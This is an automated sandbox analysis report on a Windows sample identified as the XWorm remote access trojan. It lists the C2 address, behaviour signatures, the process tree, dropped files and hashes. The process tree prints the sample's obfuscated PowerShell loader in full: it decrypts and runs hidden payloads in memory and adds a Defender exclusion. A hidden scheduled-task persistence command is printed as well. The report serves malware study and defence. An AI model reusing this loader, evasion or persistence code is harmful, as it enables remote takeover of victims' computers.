Overview

overview

10

Static

static

3

HybridloggerV5.5.exe

windows7-x64

8

HybridloggerV5.5.exe

windows10-2004-x64

10

Resubmissions

22-01-2025 00:02

250122-abvbvaxpht 10

21-01-2025 23:59

250121-318jzsyjfq 10

Analysis

  • max time kernel
    79s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-01-2025 00:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    HybridloggerV5.5.exe

  • Size

    937KB

  • MD5

    c9314841cdbf8522e9ee925039d3bfb7

  • SHA1

    1b851459626862fdae6bdc0dd30aadf7a0f905ee

  • SHA256

    9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

  • SHA512

    fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0

  • SSDEEP

    24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

C2

193.161.193.99:24469

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe
    "C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1432
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4468
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:648
        • C:\Windows\system32\findstr.exe
          findstr /C:"trey" banned_users.txt
          3⤵
            PID:1372
          • C:\Windows\system32\findstr.exe
            findstr /C:"trey gang" users.txt
            3⤵
              PID:1740
            • C:\Windows\system32\findstr.exe
              findstr /C:"EXI" banned_users.txt
              3⤵
                PID:4316
              • C:\Windows\system32\findstr.exe
                findstr /C:"EXI gang" users.txt
                3⤵
                  PID:1960
                • C:\Windows\system32\findstr.exe
                  findstr /C:"trey" banned_users.txt
                  3⤵
                    PID:2460
                  • C:\Windows\system32\findstr.exe
                    findstr /C:"trey gang" users.txt
                    3⤵
                      PID:2076
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4796
                    • C:\Windows\system32\net.exe
                      net file
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2152
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 file
                        4⤵
                          PID:3764
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3980
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_661_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_661.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3620
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_661.vbs"
                          4⤵
                          • Checks computer location settings
                          • Suspicious use of WriteProcessMemory
                          PID:4252
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_661.bat" "
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:964
                            • C:\Windows\system32\net.exe
                              net file
                              6⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4600
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 file
                                7⤵
                                  PID:2768
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_661.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                6⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Drops startup file
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: GetForegroundWindowSpam
                                • Suspicious use of SetWindowsHookEx
                                PID:5020
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                      1⤵
                      • Enumerates system info in registry
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of WriteProcessMemory
                      PID:1764
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff97d1046f8,0x7ff97d104708,0x7ff97d104718
                        2⤵
                          PID:1340
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
                          2⤵
                            PID:1244
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
                            2⤵
                              PID:1908
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
                              2⤵
                                PID:4252
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
                                2⤵
                                  PID:2688
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                                  2⤵
                                    PID:3616
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
                                    2⤵
                                      PID:680
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
                                      2⤵
                                        PID:1128
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
                                        2⤵
                                          PID:2084
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
                                          2⤵
                                            PID:2736
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1
                                            2⤵
                                              PID:2116
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
                                              2⤵
                                                PID:3880
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
                                                2⤵
                                                  PID:4564
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
                                                  2⤵
                                                    PID:1128
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
                                                    2⤵
                                                      PID:224
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
                                                      2⤵
                                                        PID:1032
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5592 /prefetch:8
                                                        2⤵
                                                          PID:5004
                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                        1⤵
                                                          PID:2096
                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                          1⤵
                                                            PID:4712

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                            Filesize

                                                            3KB

                                                            MD5

                                                            661739d384d9dfd807a089721202900b

                                                            SHA1

                                                            5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                            SHA256

                                                            70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                            SHA512

                                                            81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                            Filesize

                                                            152B

                                                            MD5

                                                            36988ca14952e1848e81a959880ea217

                                                            SHA1

                                                            a0482ef725657760502c2d1a5abe0bb37aebaadb

                                                            SHA256

                                                            d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

                                                            SHA512

                                                            d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                            Filesize

                                                            152B

                                                            MD5

                                                            fab8d8d865e33fe195732aa7dcb91c30

                                                            SHA1

                                                            2637e832f38acc70af3e511f5eba80fbd7461f2c

                                                            SHA256

                                                            1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea

                                                            SHA512

                                                            39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
                                                            Filesize

                                                            64KB

                                                            MD5

                                                            d6b36c7d4b06f140f860ddc91a4c659c

                                                            SHA1

                                                            ccf16571637b8d3e4c9423688c5bd06167bfb9e9

                                                            SHA256

                                                            34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

                                                            SHA512

                                                            2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
                                                            Filesize

                                                            70KB

                                                            MD5

                                                            3b06aa689e8bf1aed00d923a55cfdd49

                                                            SHA1

                                                            ca186701396ba24d747438e6de95397ed5014361

                                                            SHA256

                                                            cd1569510154d7fa83732ccf69e41e833421f4e5ec7f70a5353ad07940ec445c

                                                            SHA512

                                                            0422b94ec68439a172281605264dede7b987804b3acfdeeb86ca7b12249e0bd90e8e625f9549a9635165034b089d59861260bedf7676f9fa68c5b332123035ed

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                            Filesize

                                                            5KB

                                                            MD5

                                                            b03866b909d9327ae91f879672d272f6

                                                            SHA1

                                                            8c59f4fbaed4cc3f90cad25f0eb1be86a70ff2d9

                                                            SHA256

                                                            832d4ba56984cff8929769f4c3714ad4b4eaafa2f41068366a79ea1007f30f97

                                                            SHA512

                                                            d0ccd88779b4a3c22bcfef46e5c74c9c54db78afc1d20d906d8cd7524fc31cd4560b7dbcd93040f9e0fa0b6c6aa662c42afcbbd4c5b992b88cca782e514c1728

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                            Filesize

                                                            6KB

                                                            MD5

                                                            82309835685f350011c7dd3b672af3ea

                                                            SHA1

                                                            6c546b5cbe1938b3f58867c7cd0d1d099fb2b433

                                                            SHA256

                                                            8c8f93d75b6182b69aaff8785594589986bd319d61f6551e39b1c47fd347e122

                                                            SHA512

                                                            e49792d546bcf59e4287af09d2e23b2b9327216a20740f180950980761b0ffbaa306d67130e2f57209cf764371162f2cc86b10a01dc8eb05cb208fec9a16e3a4

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                            Filesize

                                                            16B

                                                            MD5

                                                            6752a1d65b201c13b62ea44016eb221f

                                                            SHA1

                                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                            SHA256

                                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                            SHA512

                                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                            Filesize

                                                            10KB

                                                            MD5

                                                            94091f879c2adb78126f13a82dfcd01b

                                                            SHA1

                                                            4e094175e5e787c96306e0bca3b33b09afcd7232

                                                            SHA256

                                                            bb352d30c8df366329e07bd920588d0b64bca7824137e6e87b062913e9f01aaf

                                                            SHA512

                                                            f8b76e243deeb070512d31a8c45772e482cb8e0feb93654c9892eeae03951280de0b43434089c711a86126742781487a10085cbf5f9fac1c47c57dde764123ff

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            dbbf71e9fb59f80938f09809b160e441

                                                            SHA1

                                                            8b9a517d846cb9a0a284f77ed88328236a85055f

                                                            SHA256

                                                            e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

                                                            SHA512

                                                            90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat
                                                            Filesize

                                                            12KB

                                                            MD5

                                                            89a22d3791ca38666c8144725a74497d

                                                            SHA1

                                                            96b672089a3c783e4dd27e8da7c0cc1245d55cfd

                                                            SHA256

                                                            9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94

                                                            SHA512

                                                            6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat
                                                            Filesize

                                                            910KB

                                                            MD5

                                                            72ecd938d114e246eeebc8ae430fc2e9

                                                            SHA1

                                                            9ece59be22ceadcb3951093483cc69a76658801d

                                                            SHA256

                                                            4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65

                                                            SHA512

                                                            d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gup0p1vt.y3c.ps1
                                                            Filesize

                                                            60B

                                                            MD5

                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                            SHA1

                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                            SHA256

                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                            SHA512

                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Temp\users.txt
                                                            Filesize

                                                            12B

                                                            MD5

                                                            e4d8e6c7a373e187a7f6d849cfc12ce6

                                                            SHA1

                                                            9e842363bd857128ca89fb150133197243e3ecb6

                                                            SHA256

                                                            b41cfb64e842114edef3951f4e65e92109f0e112be519b001fe92afef319a049

                                                            SHA512

                                                            00d8f1485e9dafa1ed33a61e9f2c3178683e2648bbb103a46d0514bc9c25123fbe1ce2f3ed2626e0590d07277114ca6ad64a3fc3ce942f819d2ac881de49bdd8

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\startup_str_661.vbs
                                                            Filesize

                                                            115B

                                                            MD5

                                                            e69ade7b74507cc1190cd507818038b6

                                                            SHA1

                                                            51d9aa84d28be188997966dbfd47eccb7c34f186

                                                            SHA256

                                                            1a5273c77b08d8753cdeac97f9ebebd3775607e107a3dcb9dcac02b9351f7f01

                                                            SHA512

                                                            6550bd4bc045a1c188bc395cc2450d44f99bc222eee03e57e581593277a061456d17371e8c01d4183c80e6dadfc64fe27c0fce3cc1cc8d33f36ea1de8f0a015a

                                                            Download Submit

                                                          • memory/1432-0-0x00007FF989863000-0x00007FF989865000-memory.dmp

                                                            Filesize

                                                            8KB

                                                            Download

                                                          • memory/1432-1-0x0000000000200000-0x00000000002F0000-memory.dmp

                                                            Filesize

                                                            960KB

                                                            Download

                                                          • memory/3980-22-0x000001D175170000-0x000001D1751A8000-memory.dmp

                                                            Filesize

                                                            224KB

                                                            Download

                                                          • memory/3980-21-0x000001D175140000-0x000001D175148000-memory.dmp

                                                            Filesize

                                                            32KB

                                                            Download

                                                          • memory/3980-16-0x000001D174EF0000-0x000001D174F12000-memory.dmp

                                                            Filesize

                                                            136KB

                                                            Download

                                                          • memory/5020-53-0x000001FBFDE10000-0x000001FBFDE26000-memory.dmp

                                                            Filesize

                                                            88KB

                                                            Download